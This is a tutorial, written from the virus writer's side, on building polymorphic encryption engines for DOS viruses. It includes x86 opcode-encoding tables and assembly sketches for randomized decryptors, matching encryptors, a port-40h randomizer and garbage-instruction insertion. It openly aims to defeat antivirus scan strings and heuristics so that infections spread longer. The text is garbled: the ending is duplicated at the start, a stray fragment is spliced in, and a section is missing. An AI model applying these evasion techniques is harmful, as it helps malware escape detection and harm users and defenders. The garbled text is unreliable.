should generate that particular routine. As some things have to be done in
several decryptor layouts (e.g. increasing the register), it's often wise to make
routines (e.g. for increasing the register) which are independent of which
decryptor-layout setup they are called from. So the increase_pointer routine
(which in its turn chooses from a variety of instructions) must be able to
be called from different layout setups.
As you may have noticed, this article is rather long and was time-consuming to write. I hope it was at least at some points understandable.
If the response suggests it, I might just release another article about oligomorphic or even metamorphic Assembly (depending on what you might want to have released…?)…
Greetings.
NOTE: This article will mainly focus on 80x86 architecture.
Note: Reading time - 30 minutes +; If you follow along, even more.
Polymorphism is, in my opinion, very hard to explain well in just one
little tutorial or term.
So, let me quote Wikipedia on it to explain the term more accurately:
In computing, polymorphic code is code that uses a polymorphic engine to mutate while keeping the original algorithm intact - that is, the code changes itself every time it runs, but the function of the code its semantics will not change at all. For example, the simple math expressions 3+1 and 6-2 both achieve the same result, yet run with different machine code in a CPU. This technique is sometimes used by computer viruses, shellcodes and computer worms to hide their presence. As I went through the internet I was wondering where to learn such an interesting method of encrypting code, especially in Assembly. So I just decided to make an article about it. look like one. This will fool most heuristic engines.
At this point the virus can’t be spotted as an unknown virus (this type of virus scanning is called “generic” detection, of which heuristic detection is an example). But this still is not enough. Once the virus reaches an AV person meaning a professional reverse-engineer who commonly knows what he is doing, he can easily make a scan string from your 133+ anti-heuristic decryption routine resulting in all your effort drowning down the drain. Your virus / malware suddenly becomes detectable by every AV product known to mankind… (I know, it’s a bit exaggerated, but it’s a real nuisance if something gets detected and reverse-engineered…)
To prevent the AV community from using scan strings to detect your virus, you should avoid any constant values in the virus. We already encrypted the virus body, but the decryptor always remains constant, and can therefore be used for a scan string. Of course, we can’t encrypt the decryption loop, but a possible solution is letting the virus produce different decryption loops for each (number of) infection(s). This way, one copy of the virus will never look the same as another one. In other words: An AV product can’t possibly detect the virus with a scan string.
Nice, but is this really worth all the hassle (considering e.g. most of the time engines are larger than the viruses itself) ? Most of the time: YES. First of all, a polymorphic virus is very annoying for the AV people or rather engineers, and assuming the engine is complex enough, they have to design a detection method dedicated to your particular engine. This will take some time, which gives your virus some more time to spread. Second of all, designing a detection method which cathces 100% of all possible generations is very hard. The more complex your engine is, the harder it will be. If your polymorph is
not 100% detectable, it still stands a chance to survive, EVEN if AV say they can detect it. At this point I agree with Bontchev:
Any detection rate below 100% is practically useless, as one wrongly left infected file can re-infect the whole system/network. Concluding, it’s fair to say that (well implemented) polymorphism is a very powerful tool as both a pre- and post-discovery strategy.
3. How do I call an engine?
The first thing that needs to be understood is how an engine normally is implemented in a virus.I’ll explain it. Here’s an example: (If you already understand this, you can skip this chapter, but keep these
parameters in mind, as I will be referring to them in the following example engine.)
Entry parameters:
DS:SI = code to be encrypted (virus body)
ES:DI = place to put decryptor and encrypted code
CX = code length
AX = offset in memory of virus entry
Returns:
CX = length of decryptor + encrypted code
DS:DX = offset of decryptor and encrypted code
What the engine will do, is encrypt a piece of code (the virus) with
some nice scheme, and place a matching decryptor in front of it. As you can
see, a user-friendly engine returns the parameters in i21/40 format: after
the engine is called, the virus needs only to set AH=40 and call Int21,
assuming the handle is in BX. Note that the input ES:DI and the output DS:DX
are the same.
So, what to do is the following:
(1) Set the correct parameter to point to the virus body, here DS:SI;
(2) Set the correct parameter to a free space in memory, big enough to
hold the decryptor and the encrypted virus body (Don’t forget to
include the engine in the size it’s a part of the virus.)
Here this parameter is ES:DI. Mostly the free space used is after
the virus.
(3) Set the correct parameter to the size of the virus (again include
the size of the engine, as it is a part of the virus).
(4) Set the memory offset parameter (here AX) to it’s correct value. This
is the offset (in memory, when the file is loaded) at which the
decryptor will start. This may require an example:
When infecting a 200 (decimal) bytes long COM, the offset at which the
decryptor (the beginning of the virus) will start would be 100h + 200d
= 1C8h. Note that the offset in the FILE would be 200d = C8h, but as
you know a COM file is loaded in memory after PSP, ie. starting from
offset 100h. With EXEs, this value would be the EXE’s new IP you’re
storing in the file header, as DOS doesn’t mess with this offset.
(5) We’re almost ready to call the engine. The last thing to check is
if the engine destroys registers that aren’t used as parameters. It
will save you some debugging.
After that, call poly.
4. An example
A polymorphic engine produces (from a given amount of variations) a random decryptor which matches the (also random) encryption method on each infection. How does it know how to do that? The programmer of the engine thought of a couple of decryptor layouts, from which the engine chooses one,
and then it randomizes any variable bytes in it. This requires explanation: Let’s just assume that a (primitive) engine has only one decryptor layout.
Let’s say it looks like this:
MOV <reg16> , offset_of_first_encrypted_word ;[1]
:decrypt_next_byte:
<crypt> [<reg16>] , random_immediate ;[2]
<reg16> ;[3]
CMP <reg16> , offset_of_last_encrypted_word ;[4]
JB decrypt_next_byte ;[5]
Legenda: <reg16> = a random 16 bit register (AX, BX, SI, BP, etc.)
[<reg16>] = pointer to contents of offset stored in <reg16>
eg: BX=1234, [BX]=what's at offset 1234
<crypt> = a crypt instruction, eg: XOR, ADD, SUB
= add 2 to the <reg16> (add 1 for byte encryption)
The engine will fill in all variable values:
[1] It selects (from a table given by the programmer) a random register to
work with. In this example the engine will store the MOV instruction
encoded with the correct register (more on this later), after which it
will store the offset of the first encrypted byte (or word) of the virus.
[2] After that, it selects (again from a table given by the programmer) a
decrypt operation. Note that the engine has to remember which decrypt
operation it chose, because later on, the virus has to be encrypted in such
a way that the previously generated decryptor will correctly decrypt the
virus. That’s right, the encryption method is derived from the generated
decryptor. The engine stores the crypt-instruction, and then it will
generate a random value (c.f. immediate) which will accompany the crypt
operation. Again this value needs to be remembered, otherwise later on, the
virus can’t be encrypted so that the decryptor works. For example, if the
random value is 1234 and the crypt-operation is XOR and the register is BX,
the crypt-instruction is XOR [BX],1234 (duh). The engine stores the value,
and repeats [3] for a (random) amount of times, as one single encryption
operation yields a weak encryption.
[3] Add 2 to . Advanced engines make a choice whether to use byte or
word encryption, this engine uses word encryption. The
register needs to be increased by two, so that in the next decryption loop
the decryptor will decrypt the next word.
[4] Compare the register to EOV (end of virus). Speaks for itself.
[5] If we haven’t reached EOV yet, jump and decrypt the next byte/word.
4.1 Register Encoding
In this example the engine wants to pick a register. To understand how this works we need to take a look at instruction encoding of the 80x86. If you don’t have technical documents at hand you can easily grab SoftIce and a Hex-Bin calculator to start investigating. Here’s a piece of MOV reg16,reg16 when I looked at it:
INSTRUCTION HEX BINARY
MOV AX,AX 8BC0 10001011 11000000
MOV AX,BX 8BC3 10001011 11000011
MOV AX,CX 8BC1 10001011 11000001
MOV AX,DX 8BC2 10001011 11000010
MOV BX,AX 8BD8 10001011 11011000
MOV BX,BX 8BDB 10001011 11011011
MOV BX,CX 8BD9 10001011 11011001
MOV BX,DX 8BDA 10001011 11011010
MOV CX,AX 8BC8 10001011 11001000
MOV CX,BX 8BCB 10001011 11001011
MOV CX,CX 8BC9 10001011 11001001
MOV CX,DX 8BCA 10001011 11001010
(…)
Obviously, the first byte in a MOV reg16,reg16 instruction always is 10001011b or 8Bh. The second byte
only changes a little if we alter the registers. A closer look reveals that bit 5-7 always remain 110.
NOTE: The bit most to the right is called bit 0, so the bit most to the left is the last bit: bit 7. A byte consisting of 7 bits instead of 8? No, bit 0 is the 1st bit, so bit 7 is the 8th bit.
The last bits remain 110. Now it looks like the rest of the byte changes all the time, which is indeed the case. I hear the attentive reader shouting: but what about the 5th and the 3rd bit?! Well, in this example I didn’t use the 16 bit registers SI, DI, SP and BP. Those ones can also be encoded, and they require that third bit.
Conlusion: 10001011 11… = MOV reg16,reg16
Note that the first three dots are filled by bits representing the TARGET register, ie. the one to the left, and the second three are representing the SOURCE register, the one to the right.
The attentive reader probably noticed that I just explained the MOV reg16,reg16 instruction, while the MOV in the example engine doesn’t need the two registers after the MOV, but only one register and an immediate (the starting offset). Let’s take a look at that:
INSTRUCTION HEX BINARY
MOV AX,1234 B83412 10111000 00110100 00010010
MOV CX,1234 B93412 10111001 00110100 00010010
MOV DX,1234 BA3412 10111010 00110100 00010010
MOV BX,1234 BB3412 10111011 00110100 00010010
MOV SP,1234 BC3412 10111100 00110100 00010010
MOV BP,1234 BD3412 10111101 00110100 00010010
MOV SI,1234 BE3412 10111110 00110100 00010010
MOV DI,1234 BF3412 10111111 00110100 00010010
This time it may be more interesting to look at the Hex values than to look at the binary values. I have sorted the instructions a bit, so it shouldn’t be hard to see a pattern. The difference with the previous example is that the ‘register encoding’ in the instruction is now done in the first (and only) byte of the instruction itself. The whole instruction takes three bytes: one for the instruction itself with a register encoded in it, and in the other two the immediate is stored, in Intel little-endian format.
When we further analyze this example, we see that (in the first byte) only the last three bits change every time. Considering the fact that 3 bits are necessary to encode 16 bit registers in instructions, that should be fine.
Conclusion: 10111… 00110100 00010010 = MOV , 1234
Now it’s time to list the registers and how they’re encoded in instructions. Looking at both examples we can easily spot following:
AX = 000b = 0h
CX = 001b = 1h
DX = 010b = 2h
BX = 011b = 3h
SP = 100b = 4h
BP = 101b = 5h
SI = 110b = 6h
DI = 111b = 7h
All usable 16bit registers are listed here (IP doesn’t count), and we can see that they all just fit in the available 3 bits. What a coincidence… Write this list down, you’ll be needing it.
The question is now, how do we tell the engine to do this? Very simple: the boys at Intel invented the OR instruction. I think many beginner virus writers do not know the exact purpose of this instruction, while for simple COM/EXE techniques this instruction is seldomly used. I think you should keep that in mind… :
0 OR 0 = 0
0 OR 1 = 1
1 OR 0 = 1
1 OR 1 = 1
But you’re probably wondering: for what purpose would I ever want to use this instruction? Well, what it actually does, is making sure that in the target byte all bits are SET (=1), which are set either in value 1 OR in value 2. And this is very useful for register encoding: Remember our “wildcard” for MOV ,? It was: 10001011 11… = MOV ,, with the first three dots for the target reg16, and the second three for source reg16. Say we fill the dots with zeros, and then OR them with the encoding value for registers. Say we wanted MOV BX,CX. First we’d want to move the value 10001011 11000000 (the basic value for MOV ,) in a register, otherwise the CPU can’t work with it. We’ll put it in AX:
MOV AX, 8BC0h (use your bin2hex calculator)
Then we want to have the encoding value for the target register in bit 3-5, and the source register in bit 0-2, because the MOV instruction requires us to do so. BX=011b and CX=001b, so when we put this together we get: 011001b What happens when we OR this value with AX (which contains the value for a
MOV instruction): OR AX, 19 (again use the bin2hex calculator).
AX = 8BC0 = 10001011 11000000
19 = 00000000 00011001 OR
---------------------
10001011 11011001 ;which is 8BD9, which is MOV BX,CX
Mission accomplished, you now know how to encode registers in instructions.
4.2 Picking a register
One of the first things an engine needs to do, is to pick a register to work with. Here we will see a big drawback of this particular decryptor layout example. In this example we are using registers to point to memory locations, that means e.g. XOR [BX],1234. Due to the 80x86 architecture, we are limited to but four registers to do that, namely BX, SI, DI and BP. So XOR [AX],1234 for example is an illegal instruction. Only those four registers are capable of this addressing mode.
*There's one problem with BP though. Let me show you something:*
81 37 34 12 XOR WORD PTR [BX],1234
81 77 01 34 12 XOR WORD PTR [BX+1],1234
In the first instruction, we’re addressing with just the register, without a relative offset. In the second instruction, we DO have a relative offset, and it is encoded in an extra byte. Note that the second byte changes from 37 to 77 when we introduce the relative offset. On bitlevel, 37 and 77 only differ 1 bit, namely the sixth. This is of course to let the CPU know whether there will be a relative offset or not.
81 34 34 12 XOR WORD PTR [SI],1234
81 74 01 34 12 XOR WORD PTR [SI+1],1234
The same story goes for SI. When there is no relative offset accompanying the register (in other words: relative offset = 0), the instruction looks different. And it also applies to DI, but not for BP.
81 76 00 34 12 XOR WORD PTR [BP+00],1234
81 76 01 34 12 XOR WORD PTR [BP+1],1234
As you can see, when there is no relative offset accompanying the register, it’s still encoded, simply as a zero byte.
What does this have to do with the engine? Well, in the decryptor in the example, we’re addressing without a relative offset. For SI, DI and BX goes that there will not be a zero byte to let the CPU know, but just a bit set or unset in the instruction byte. This is a good thing, because otherwise we would have a stable byte (i.e. a byte that’s the same in each decryptor generated), namely the zero. So if we wanted the engine to be able to pick registers from a list which included BP, we would have to write a routine
that checks if he picked BP, and if so, adjust the instruction byte, and write the extra zero. Of course, for the purpose of creating decryptors as random as possible, this is a good idea. This, however, is an advancement to be worked on when you finished a working engine. I’m giving you a good advice here: don’t try to create a complex engine right away, first start with a simple but working ‘framework’, which you can expand later on. If you start including all kinds of nice features, you’ll probably just end up debugging and that for a very long time.
Back to the example. I’m assuming we’ll just use BX, SI and DI, so we don’t have to deal with that relative offset. Just put the register encoding values for BX, SI and DI ina table, and let the engine choose from them.
Maybe you’re wondering why I told you this whole story about BP and it’s relative offset. It’s not really that important and specifically a problem for this type of decryptor layout, and I also just could’ve told you:
don’t use BP in this example. I didn’t, because I wanted to let you know you can’t just “assume” stuff, and you should check everything.
4.3 Moving
In the example engine, we want to have MOV , imm16, which looked like:
10111... 00110100 00010010 = MOV <reg16>, 1234
We don’t want the 1234, so forget the last two bytes. Important is that the instruction byte (the first byte) is 10111…, with a register encoding value filling the last three dots.
Example: how would we make the engine generate a MOV SI,0120 in the decryptor? We’d first have to fill the dots in the unencoded value for MOV , imm16 with zeros, so we can OR the value to the correct opcode. From now on, when I’m talking about an unencoded value for an instruction, I’m assuming the dots are filled with zeros. Okay, so the unencoded value for MOV , imm16 is B8h (converted in hex), let’s put that value in AX. Then, we’d have to OR AX with the correct register encoding value. We wanted SI, whose value is 6h (110b) so we will perform: OR AX,6h.
4.4 Decrypting
Let me first of all mention once again the fact that the strategy behind most engines is that first the decryptor is generated, and after that the correct (matching) encryption is applied to the virus. Just to prevent some confusion.
´Now, we want to make a decryptor, and we want each decryptor to be as random as possible. So we have to give the engine as much as possible crypt operations. XOR, ADD and SUB are good examples, because they have the same instruction layout. They work with 2 operands, for our purpose we will have
the pointing register, and a random 16 bit immediate, so e.g. SUB [BX],1234. It’s a good to include more crypt operations like NEG, NOT, INC, DEC, but the disadvantage of these other types is that they have other instruction layouts, and therefore require separate routines for including in the decryptor. If you decide to include more crypt operations in your engine, these four are a good choice, because they all require one operand, and for our example engine that would be a pointing register, e.g. not [SI]. Let’s just say our example engine uses only XOR, ADD, and SUB.
Again, to build an instruction, we need to know the unencoded value for the instruction. Assuming the dots (where the register encoding should take place) are filled with zero-bits, here are the values:
XOR: 81 30 xx xx
ADD: 81 00 xx xx
SUB: 81 28 xx xx
Please note that these are the values for use with pointing registers. So with these values, you would be able to produce an instruction like XOR [SI],1234 but not XOR SI,1234 ! We need pointing registers for our example engine, so the above values will do.
Another important note: the first byte is 81, no matter what crypt instruction the engine picks… That’s not the best solution, because the whole idea of the engine is that we wouldn’t have “stable bytes” in the decryptor. So you can see you can’t just do with only these three crypt operations, simply
because it’ll create a stable byte. As said, it is wise to ignore this for the time being, and first try to create a working engine. Then you can start working on problems like these. Well, you actually need to work on them, because if you leave stable bytes in your decryptor, you still haven’t eradicated the possibility for scan strings.
Okay, back to the program, say the engine picked ADD to include as crypt operation. We can simply store the 81, while it doesn’t need any register encoding. Then we have to encode the correct register in the second instruction byte. Earlier, we encoded just the registers in the instruction, and now we need to encode pointing registers in the instruction. I haven’t given you the encoding values for the pointing registers, so here they are:
000b = 0h = [BX+SI]
001b = 1h = [BX+DI]
010b = 2h = [BP+SI]
011b = 3h = [BP+DI]
100b = 4h = [SI]
101b = 5h = [DI]
110b = 6h = [direct 16-bit address]
111b = 7h = [BX]
You should see a possible enhancement here: addressing with two registers. For example, set BX to zero and let SI be the pointing register, but now use [BX+SI] instead of just [SI] to address the correct byte/word. That results in more randomness.
OR the second opcode byte from the table (00h for ADD; it would have been 30h or 28h had the engine picked XOR or SUB) with the correct pointing-register encoding value, store the byte, and store a random 16-bit immediate. Don’t forget to “remember” which crypt operation the engine stored and which immediate it used. Most engines create an encryptor along the way, which can then be executed once the decryptor has been generated.
This is only one crypt operation. Just repeat this step a couple of times, depending on how many crypt operations you want in your decryptor.
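As an illustration, here is a rough sketch of emitting one crypt operation, say XOR [SI],imm16 (81 34 xx xx); the ES:DI build-buffer convention, the get_random_word routine and the current_key variable are my assumptions:

        mov     al, 81h                 ; stable first byte for XOR/ADD/SUB r/m16,imm16
        stosb
        mov     al, 30h                 ; unencoded second byte for XOR (00h = ADD, 28h = SUB)
        or      al, 4                   ; pointing-register encoding for [SI] (100b) -> 34h
        stosb
        call    get_random_word         ; hypothetical routine: random key in AX
        stosw                           ; store the imm16 key
        mov     [current_key], ax       ; "remember" the key for the encryptor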
4.6 Increasing
Now it’s time for the decryptor to increase the pointing register. Since we’re using word encryption, the register needs to be increased by two. Obvious choices are two INCs, ADD reg,2, or maybe even SUB reg,-2. But also consider string instructions like SCAS, CMPS, STOS, LODS and MOVS: they perform an action and then increase SI, DI or both, which could suit our purposes quite well. Be careful with these, however, as for instance MOVS may have unwanted side effects. You should be able to find the correct values for these instructions yourself. To keep this tutorial from getting too long-winded I will only briefly explain the use of the two INCs; by now you should be able to figure out the rest yourself.
The unencoded hex value for INC reg16 is 40h (hi P/S), and you should encode it with the normal register encoding values, not the pointing-register values, because a memory operand would turn it into a crypt operation (compare INC BX and INC [BX]). E.g. INC SI would be 40h OR 6h = 46h, with 6h being the register encoding value for SI. This should be clear by now. Store the result.
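For example, emitting the two INC SI instructions could look like this (same build-buffer assumption as before):

        mov     al, 40h         ; unencoded INC reg16
        or      al, 6           ; register encoding for SI -> 46h = INC SI
        stosb                   ; first INC SI
        stosb                   ; second INC SI (AL still holds 46h)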
After that, we’ll have to store the imm16 operand of the CMP that ends the loop. This value marks the last byte/word that needs decrypting. How do we calculate it? Rather simply: starting offset + code length. The code length is passed to the engine in CX, and the starting offset can be calculated as memory offset + decryptor length. The memory offset was again a parameter for the engine, namely AX, and the decryptor length shouldn’t be hard to calculate. If your decryptors are always the same length it’s easy, but with variable-length decryptors you should keep track of how many bytes you’re storing. So:
               AX                decryptor length              CX
/------------------------------\/----------------\/----------------------------\
.------------------------------.-----------------.-----------------------------.
|          Host file           |    Decryptor    |         Virus body          |
'------------------------------'-----------------'-----------------------------'
                                   last byte/word to be encrypted -------------^
AX + decryptor length + CX = CMP operand
Add the values, and store it as operand.
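In code this is trivial; the sketch below assumes AX still holds the memory offset passed to the engine, CX the code length, and (my own bookkeeping choice) BX the number of decryptor bytes emitted so far:

        ; CMP operand = memory offset + decryptor length + code length
        add     ax, bx          ; + decryptor length counted so far
        add     ax, cx          ; + virus body length
        stosw                   ; store it as the CMP's imm16 operand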
4.7 Jumping
After the CMP comes a conditional jump. The obvious instruction is JB, but that again introduces a stable byte, because we don’t have a substitute for it. Of course, alternatives like JC or JNAE would be nice, but the problem is that they assemble to exactly the same hex value as JB, which is not so strange considering they are just different names for the same instruction. What about JNZ? That could be interesting, but only if we add one/two to the CMP operand, otherwise the last byte/word wouldn’t get decrypted. Again, I’m assuming we’re only using JB. (Note that IF you choose to use the JNZ variant, the following explanation also largely applies to it.)
If the condition is met (condition = we’re still below the last byte/word) the jump should go back to the first decryption operation. How do we “encode” this? First of all, JB has 72h as its hex value, so we can store that. As you should know from COM infections, such a jump has a displacement byte right behind it. This displacement byte is the number of bytes the CPU should move IP, counted from the offset of the next instruction (so 2 bytes past the 72h of the JB). Here’s an example:
0BF9:03B6 81 37 64 23 XOR [BX],2364
0BF9:03BA (...) (...)
0BF9:03C6 81 FB A4 06 CMP BX,06A4
0BF9:03CA 72 EA JB 03B6
0BF9:03CC (...) (...)
In this example the first decrypt operation starts at offset 3B6. The “next instruction” I was talking about would start at 3CC in this example. So the correct calculation for the JB displacement is:
New offset - Offset of next instruction = Displacement
3B6 - 3CC = FFEA
As you can see, we get FFEA as displacement. We can only use one byte, so that becomes EAh. Normally you would say that EAh = 234d, but read as a signed byte EAh = -16h (-22 decimal), and that is exactly the number of bytes the CPU should move IP back. Note that you don’t have to worry about things like the memory offset: it doesn’t matter where in memory this code is located, the displacement will be the same every time, as the number of bytes to move doesn’t change.
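A possible sketch of how the engine could compute and store this displacement; that SI holds the build-buffer offset of the first crypt operation and that ES:DI points just past the CMP are my assumptions:

        mov     al, 72h         ; JB opcode
        stosb                   ; DI now points at the displacement slot
        mov     ax, si          ; offset of the first crypt operation
        sub     ax, di          ; minus the offset of the displacement slot...
        dec     ax              ; ...minus 1 more = relative to the next instruction
        stosb                   ; store the (negative) displacement byte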
5. Encrypting
At this point we’re done with the decryption loop. Along the way I kept telling you your engine should “remember” what it did. Sounds fine, but you’re probably wondering how that works. First of all, when making a table of crypt operations, it is wise to include the inverse crypt operations as well: store SUB along with ADD, ADD along with SUB, and XOR along with XOR. That way, you can store the decrypt operation in the decryptor, and the inverse operation (for encrypting) in the encryptor. Note that the first instruction in the decryptor should have its inverse operation as the last operation in the encryptor.
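One simple way to organize this, as a sketch of my own using the second opcode bytes from the table above: pair each decryptor byte with the byte of its inverse, so the engine copies one column into the decryptor and the other into its encryptor.

crypt_table:                    ; decryptor byte, encryptor (inverse) byte
        db      30h, 30h        ; XOR  <->  XOR  (its own inverse)
        db      00h, 28h        ; ADD  <->  SUB
        db      28h, 00h        ; SUB  <->  ADD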
6. Randomize
Throughout this tutorial I told you to let your engine pick something at random. Most high level languages have functions which return a “random” value, but, as usual in assembly language, we get to do it ourselves.
As a computer can’t return a truly random value, we have to build a routine that gives us a value that is as random as possible. The most-used way to get a random value is reading from port 40h (the counter of the 8253/8254 timer chip). Because that value isn’t really random, it’s wise to perform some calculations on it to randomize the number some more. Another possibility is to let decisions depend on a value like the system time or date.
BTW: when you base decisions on the system date, you get a form of slow polymorphism (the decryptor only changes from day to day).
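Here is a minimal sketch of such a port-40h based routine; the exact “stirring” operations are arbitrary choices of mine:

get_random_byte:
        in      al, 40h         ; read the 8253/8254 timer counter at port 40h
        mov     cl, 3
        ror     al, cl          ; stir the bits a little (clobbers CL)
        xor     al, 5Ah         ; some extra, arbitrary mixing
        ret                     ; semi-random value in AL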
Experiment with calculations and write a program which outputs the random values to screen on bitlevel. Investigate the values to check if they really are quite random. Note that this is quite important, and if you rely on a bad randomizer, you’ll end up with some options of your engine getting disabled, as they’re never reached.
Once you have a random value and want to use it to decide, e.g., which crypt operation to use, you have to AND it down to, e.g., the offset of the last value in the table. (If you don’t know what AND is: AND makes sure that in the result byte only those bits are set which are set in both the first operand AND the second operand. If necessary, re-read the part about OR and investigate AND in the same way, i.e. get to know what it really does.) So, if you have 5 options, AND the random value with 4, so you can add the result to the starting offset of the table. Don’t AND it with 5, because starting offset + 5 is just past the table; this is because there is a value at offset 0 too. So, if you have x values, AND the random value with x-1.
There is one problem though, which is overlooked by some writers. Get out your hex/binary calculator and start ANDing random values with 4h. Do it 100 times and you’ll only ever get 4 or 0 as a result; you’ll NEVER get 1, 2 or 3. Hmm… weird… Let’s try it with 5h: perform AND xx,5 on 100 values and you’ll get 0, 1, 4 and 5, but NEVER 2 or 3. To understand this problem, we have to look at the values we’re ANDing with at bit level:
0h = 00000000b
1h = 00000001b
2h = 00000010b
3h = 00000011b
4h = 00000100b
5h = 00000101b
6h = 00000110b
7h = 00000111b.
When ANDing with a value, bits in the result byte will only be set if they’re also set in the value you’re ANDing with. Say you’re ANDing with 5h and you’d want to get 3h as a result. 3h equals 11b, so bit 1 would have to be set in the value we’re ANDing with. Because the value we’re ANDing with is 5h, which equals 101b, bit 1 is never set, so you’ll never get 3h (or 2h) as a result. Again, this is quite important, because if you choose to neglect this problem, you’ll end up with some features of your engine simply being disabled…
I hope you already have a feeling that values with all (necessary) bits set are suitable for ANDing with, as the result of the operation varies from 0 to the value you’re ANDing with, which is what we want. So 1b (mostly unnecessary), 11b, 111b, 1111b and so on, are values suitable for ANDing with. If you have too few options in your table and can’t think of another option to fill the table with (so you can AND with one of the mentioned values), you could simply put duplicate options in your table. This isn’t as unsophisticated as it may seem at first glance, as some options are more flexible than others: e.g. when deciding whether the engine should use normal INC or a string operation (LODS, STOS, etc.) for increasing, the option for “use a string operation” is attractive for duplicating in your table, as it has more sub-options (later on, the engine has to decide which string operation it should use) than the “use an INC” option.
Please note that this is just one way of working around this problem. At this point you can use your own creativity to come up with another solution if you want to, but somehow I can’t imagine it being much more efficient memory-wise.
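To make the masking step concrete, here is a sketch of picking one of four crypt operations; get_random_byte and the byte table crypt_ops are assumptions of mine:

        call    get_random_byte         ; random value in AL
        and     al, 3                   ; 4 table entries -> mask with 11b, index 0..3
        mov     bl, al
        xor     bh, bh
        mov     al, [crypt_ops + bx]    ; second opcode byte of the chosen crypt op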
7. Sidenote
One more important note. When working on your own engine, you’re probably planning on adding some nice features. And when you’re including new instructions, you need to know the unencoded values of these instructions. If you’re not instantly running SoftIce in the background it’s probably very tempting to use DOS DEBUG to check out the values. Never do that… There is something very strange about the 80x86 architecture:
Some instructions can take two different identities. E.g. the instruction “OR AX,AX” can take “09C0” as “identity”, but “0BC0” gives us the exact same instruction.
All so-called “official” assemblers like Borland’s TASM, Microsoft’s MASM and all others pick the same one of the two choices they can make, namely the “highest” (so “0BC0” for “OR AX,AX”). In other words, if a certain instruction takes an encoding which would normally not be produced by regular assemblers, it is very likely the work of some polymorphic engine. Some (or most?) antivirus programs know this and raise an alarm if they find such an instruction. I recommend using SoftIce anyway (although its assembler also has some bugs), but if for some strange reason you don’t or can’t, use Borland’s Turbo Debugger to check the values; I guess that should do the trick too.
A sidenote to this sidenote: the still ever-popular A86 shareware assembler has a nasty side effect. At times it picks the “wrong” one of the two possible instruction encodings, resulting in the same alarms being triggered. This can easily be avoided by using TASM; there’s no reason not to use TASM anyway.
8. “Garbage”
Garbage instructions are instructions included in the decryptor which serve no real purpose for its execution, but are only there to hide the otherwise obvious real purpose of the decryptor. Without any garbage, the decryptor actually looks like a decryptor, which makes it very easy to spot heuristically. Furthermore, garbage instructions put the “real” instructions at random places (in a constant order, of course): in one generation the increase and the compare operation are right next to each other, while in another generation some other (do-nothing) instruction sits between them.
The classical concept of garbage instructions consists of including one-byte do-nothing instructions like NOP, CLC, STC, INT 3 (the only one-byte interrupt (CCh)) between the actual decryptor instructions. Nowadays, the use of these one-byte instructions has become rather trivial, as almost all AV programs just ignore these instructions when they encounter a decryption loop.
These one-byte do-nothing instructions have also led to something AV calls variable scan strings. With these scan strings it doesn’t matter whether you have zero or thousands of garbage instructions between two constant values; the AV program just ignores them and checks whether the two constant values occur in the right order (so first the increase, then the compare instruction, assuming these are stable bytes in the decryptor). In other words, these one-byte garbage instructions really serve no purpose anymore.
Furthermore, AV has noticed that huge amounts of these kinds of garbage instructions in a relatively small area are very likely to be the results of a polymorphic engine. In other words, using these one-byte do-nothing instructions can result in heuristic flags being triggered.
Luckily, there are other ways of producing “garbage code”. The basic idea behind all of them is producing code which could plausibly be code the program needs to run correctly. A nice example is including some pointless Int21 call, like GetVersion or something. There are a lot of possibilities here. Each time, take two things into account:
(*) Whatever garbage you use, make sure it doesn't influence the
    execution of the decryptor, but also make sure it LOOKS like useful
    code.
(*) When using large garbage constructions (like setting up an Int21
    call), make sure you have enough variations, otherwise AV could make
    a scan string (or a few, if one isn't enough) just from your garbage
    code!
Also consider the possibility of including some nice armouring tricks in the garbage construction (I’m calling it a construction because sometimes the “garbage” no longer consists of just one instruction), but again, make sure to have enough variations, because armour code is of course uncommon code, which AV loves, because they can make scan strings of it…
For those wondering how to include garbage instructions/constructions at random: just place a call to your garbage-insertion routine (which inserts garbage at the current offset, or decides not to) before each major decryptor operation. An extremely simplified example, followed by a sketch of such a routine:
start:
call maybe_insert_garbage
call set_up_registers
call maybe_insert_garbage
call perform_move_instruction
call maybe_insert_garbage
call do_first_crypt_operation
call maybe_insert_garbage
(...)
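And a possible sketch of what such a routine could look like; it uses a one-byte filler purely for brevity, whereas a real engine would emit the larger, varied constructions described above:

maybe_insert_garbage:
        call    get_random_byte
        and     al, 1           ; 50% chance of inserting something
        jz      no_garbage
        mov     al, 0F8h        ; CLC - harmless one-byte filler (illustration only)
        stosb
no_garbage:
        ret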
9. Multiple Decryptors
A virus writer who for some reason doesn’t want to include a complete engine, but still wants some variation in his decryptors, may consider using a couple of constant decryptors. They all do the same thing, but they look different. Here the variation isn’t on the instruction level but on the routine level, which is far simpler to implement. This technique can be called polymorphic in its literal meaning (poly=many, morph=shape), but as only a few different routines are generated, it is usually called oligomorphic (oligo=few). On its own this method isn’t considered very strong, as a set of scan strings can be used to identify every possible generation.
Combining these two methods, however, gives a very large variety of both decryptor layouts and decryptor instructions, which can be considered strong polymorphism (don’t confuse it with polymorphism in the object-oriented programming world). Most of the more powerful engines combine the two methods, and are therefore very hard to detect reliably.
10. Conclusion - The very end of this article
Throughout this tutorial I have tried to explain how to avoid constant values using variation on the instruction level. If you want to extend your engine with variation on the routine level, you’ll have to use well-considered code. The engine should decide which decryptor layout (routine) it will generate, and then it should generate that particular routine. As some things have to be done in more than one decryptor layout (e.g. increasing the register), it’s often wise to make routines (for e.g. increasing the register) which are independent of which decryptor-layout setup they are called from. So the increase_pointer routine (which in turn chooses from a variety of instructions) must be callable from the different layout setups.
As you may have noticed, this article is rather long and was time-consuming to write. I hope it was at least in places understandable.
If the response suggests there’s interest, I might release another article about oligomorphic or even metamorphic assembly (depending on what you’d like to see released…).
Greetings.